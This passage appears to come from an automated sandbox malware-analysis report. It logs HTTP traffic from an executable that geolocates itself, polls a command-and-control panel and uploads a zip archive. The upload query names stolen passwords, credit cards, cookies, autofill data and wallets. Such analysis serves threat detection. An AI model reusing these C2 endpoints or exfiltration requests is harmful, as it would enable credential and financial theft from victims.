                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        1192.168.2.349703208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:08.497775078 CET104OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Jan 23, 2023 21:25:08.532289028 CET105INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:08 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 50
                                                                                                                                        X-Rl: 43
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        10192.168.2.349713208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:39.225068092 CET116OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:39.255388975 CET117INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:38 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 60
                                                                                                                                        X-Rl: 44
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        11192.168.2.34971292.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:39.311254978 CET117OUTGET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:39.451045036 CET118INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:39 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:25:42.490222931 CET118OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:42.659754992 CET118INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:42 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        12192.168.2.34971592.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:47.864337921 CET136OUTGET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:47.998567104 CET136INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:47 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        13192.168.2.34971692.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:52.268623114 CET137OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:52.495882034 CET138INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:52 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:25:52.511815071 CET138OUTPOST /logs.php?hwid=CH65FCCAB88D&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1
                                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------8dafd8eef66f49d
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Content-Length: 791547
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Jan 23, 2023 21:25:52.642586946 CET138INHTTP/1.1 100 Continue
                                                                                                                                        Jan 23, 2023 21:25:52.644560099 CET138OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 66 64 38 65 65 66 36 36 66 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65
                                                                                                                                        Data Ascii: -----------------------8dafd8eef66f49dContent-Disposition: form-data; name="file"; filename="CH_65FCCAB88D.zip"Content-Type: application/octet-stream
                                                                                                                                        Jan 23, 2023 21:25:52.644714117 CET146OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 28 ab 37 56 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 43 61 72 64 73 2e 74 78 74 50 4b 03 04 14 00 00 00 00 00 4f ac 37 56 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 46 69 6c 65 73 5c 50 4b 03 04 14 00 00
                                                                                                                                        Data Ascii: PK(7VCards.txtPKO7VFiles\PK)7Vll,Linfo.txtN0EwK;&i:0Dp4_:{zuKLv.SO'<>PQ;icf'/kpCGiPDswG$
                                                                                                                                        Jan 23, 2023 21:25:52.644793987 CET150OUTData Raw: 65 b3 37 e6 bd 73 0e ed f3 54 fb 87 38 49 6e 4c a4 0e f3 03 33 61 86 fb 15 3b 5e 33 a1 30 4b 26 3c 5f 31 ab 41 17 e9 49 fc 15 cf 48 b0 36 71 99 f3 4f de f2 0d 31 74 02 1e 20 c9 01 d2 6a 8e 30 9e ad 0e 64 a7 9e 91 c6 aa a0 14 f0 e1 40 fd b3 f9 49
                                                                                                                                        Data Ascii: e7sT8InL3a;^30K&<_1AIH6qO1t j0d@I[S3W!~y)OCUJap_[O?{y(2'6W,[Fseojw/\OO[:ocFaoOR&de"R.G#{+H]
                                                                                                                                        Jan 23, 2023 21:25:52.775672913 CET167OUTData Raw: 05 48 07 4b b2 49 fa ca 19 3b 7b 2f 49 37 d7 39 57 35 f4 d5 29 c6 17 55 04 1e 49 44 d9 1d b5 5e 3f 09 04 61 d3 3b 21 08 58 e1 de 65 3b 96 ca 54 e4 a8 2e 37 25 75 d2 24 e5 ed 1e f5 62 e9 7a 91 dd 54 59 bc 15 c8 12 5b 20 21 a9 06 1e b3 aa 66 83 ea
                                                                                                                                        Data Ascii: HKI;{/I79W5)UID^?a;!Xe;T.7%u$bzTY[ !f?B9Ar?yORsgL RhUTeOaUk"'~)0m3~2TItyk;rDO-S6t[Z!Rpt)X#
                                                                                                                                        Jan 23, 2023 21:25:52.775759935 CET174OUTData Raw: 4b b5 43 cd e9 95 7e d5 e5 6b d7 7d c8 e7 19 ae 0b c6 96 96 46 55 e3 03 9d 5d 4c 8a 7a d3 43 e0 2f 5d 1e e9 7b e8 23 cb b2 2b 8a 28 e4 30 07 e6 31 cd de b4 99 78 45 4a ad 86 5a 8b 5f fe c6 a1 7b e2 fd 69 4f 23 17 83 45 f5 07 a9 2e ec a7 2b 09 3f
                                                                                                                                        Data Ascii: KC~k}FU]LzC/]{#+(01xEJZ_{iO#E.+?*-'JZm$mY!5jJ5 oe]O$I&V3$N+)I4W|dTtS_!lIXm2.[Bb%/!M$oMFs37lBktgaK_R&R
                                                                                                                                        Jan 23, 2023 21:25:52.907457113 CET219OUTData Raw: 5b af ae 09 0f fb a5 86 dc 72 11 f2 e6 10 09 db 7c 26 84 0f 8a 09 20 18 e1 c2 5a 18 f6 cf 1f c7 64 ed 29 80 5e 67 4e 38 aa 5e d8 8a 60 db 1f 93 6a 03 0f 24 d3 52 23 3d fa 90 7f df 3c 34 63 7c f5 4b 48 6d 6f 48 1c c8 3b be 05 75 fa c6 cb af fc 29
                                                                                                                                        Data Ascii: [r|& Zd)^gN8^`j$R#=<4c|KHmoH;u)SmIjT~M,^cn'KTPH&Z(`IEZJ%Xg8so-(8><KF@G=+: WB@JPbc[hB:5u;`P
                                                                                                                                        Jan 23, 2023 21:25:52.907891035 CET223OUTData Raw: 21 75 83 77 f4 f4 8c a3 e7 f8 e2 f7 9f 15 7a 2e 86 c5 06 9e 07 62 51 a8 53 9f bf 30 fb b9 47 b0 fb b7 3f cf 8b 3e a4 d6 d2 f9 c0 4d dd c9 a4 d0 1b c9 51 36 c2 f4 32 00 d8 aa 2b c3 75 ff 42 9f 93 71 c0 a2 2d 3c b7 d8 fe 51 12 79 ea 17 ff ba 80 b0
                                                                                                                                        Data Ascii: !uwz.bQS0G?>MQ62+uBq-<Qy\Zb,,;A/|qIT~i7WL TUyVHy^GZBnK?)\4u@~W81\&Ntg*&-\X=UcWutab|7]i
                                                                                                                                        Jan 23, 2023 21:25:53.038795948 CET244OUTData Raw: 47 58 2b 99 42 fe 48 33 ff 73 1d df 30 dc fb 6e eb a9 25 f2 f6 28 b4 f5 14 b5 21 d9 5b 16 16 6c f3 34 51 8a 7b b5 a5 dc cc 53 66 d6 f4 d5 63 e6 88 e0 b6 1d e0 0f 8c bc 3a 3a cc 96 5a a7 6f 6e 11 b7 b4 c8 92 3c c8 40 e8 5e dc ec 62 e2 46 af a5 65
                                                                                                                                        Data Ascii: GX+BH3s0n%(![l4Q{Sfc::Zon<@^bFe!m[9T~eDp"VnizV"l8LJBZHe>Z49RwW;^wB@BT| _~&8/>y3BpRIW(<f?{]6\[Pq+Qz
                                                                                                                                        Jan 23, 2023 21:25:53.038901091 CET259OUTData Raw: 34 4c 55 d7 8c 15 8f 2d 24 f8 9a d8 6e 72 2c db 43 4b 47 8c 12 e5 c6 10 4c ce 59 d8 d7 59 e1 a5 0c 64 48 b9 0a 9e d1 7f 31 95 78 f7 92 76 be 31 9c e8 d4 92 9b 74 71 24 d2 17 eb 96 f9 e2 e4 b6 c7 a7 6d cf 58 7f af 84 ca 80 f4 ca 02 a9 df 58 8b 17
                                                                                                                                        Data Ascii: 4LU-$nr,CKGLYYdH1xv1tq$mXXbHhwIZG3Ad/C6!6`i7t4`i"-}.Sv9)j=)$0y24}[\bVmRb=~pid?sP~,`g
                                                                                                                                        Jan 23, 2023 21:25:53.038954973 CET277OUTData Raw: b6 57 53 54 6f 7c 13 15 1b 63 44 68 bc c3 06 da 09 e8 1b 97 68 50 4a ac 16 49 59 ad 9b df d6 84 20 18 c6 d1 aa f0 3b 79 f7 de c2 38 fe 3a d2 bd bb 2f 3c 26 5b eb e8 af 50 ea 84 82 53 06 e7 58 45 5b 6d b6 6a 8f bd 7a 31 19 4c 98 9f b8 c8 1b d6 1e
                                                                                                                                        Data Ascii: WSTo|cDhhPJIY ;y8:/<&[PSXE[mjz1L9F'Z8`p=CTX]+!_Ui_4%8<9qW&`Q\C-tG1d^Dl~ ,{o+B(2E\co7^2;.g
                                                                                                                                        Jan 23, 2023 21:25:54.040550947 CET922INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:53 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        14192.168.2.349717208.95.112.180C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:56.050263882 CET923OUTGET /json/ HTTP/1.1
                                                                                                                                        Host: ip-api.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:25:56.080812931 CET923INHTTP/1.1 200 OK
                                                                                                                                        Date: Mon, 23 Jan 2023 20:25:55 GMT
                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                        Content-Length: 293
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        X-Ttl: 43
                                                                                                                                        X-Rl: 43
                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
                                                                                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        15192.168.2.34971892.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:25:59.271301031 CET924OUTGET /gate.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:25:59.408112049 CET924INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:25:59 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                        16192.168.2.34971992.249.45.11380C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                        Jan 23, 2023 21:26:02.805896997 CET925OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Jan 23, 2023 21:26:02.986946106 CET926INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:02 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:03.101003885 CET926OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:03.266861916 CET926INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:03 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:03.381027937 CET926OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:03.612912893 CET927INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:03 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:03.725219011 CET927OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:03.948374987 CET928INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:03 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.057018042 CET928OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.291939974 CET928INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.396956921 CET928OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.575546980 CET929INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.678045034 CET929OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:04.855988979 CET929INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:04 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:04.959621906 CET930OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.140971899 CET930INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
                                                                                                                                        date: Mon, 23 Jan 2023 20:26:05 GMT
                                                                                                                                        server: LiteSpeed
                                                                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                        Data Raw: ef bb bf
                                                                                                                                        Data Ascii:
                                                                                                                                        Jan 23, 2023 21:26:05.256362915 CET930OUTGET /task.php?hwid=CH65FCCAB88D HTTP/1.1
                                                                                                                                        Host: panel.cheater-zone.com
                                                                                                                                        Jan 23, 2023 21:26:05.430114985 CET931INHTTP/1.1 200 OK
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                        x-powered-by: PHP/8.0.25
                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                        content-length: 3
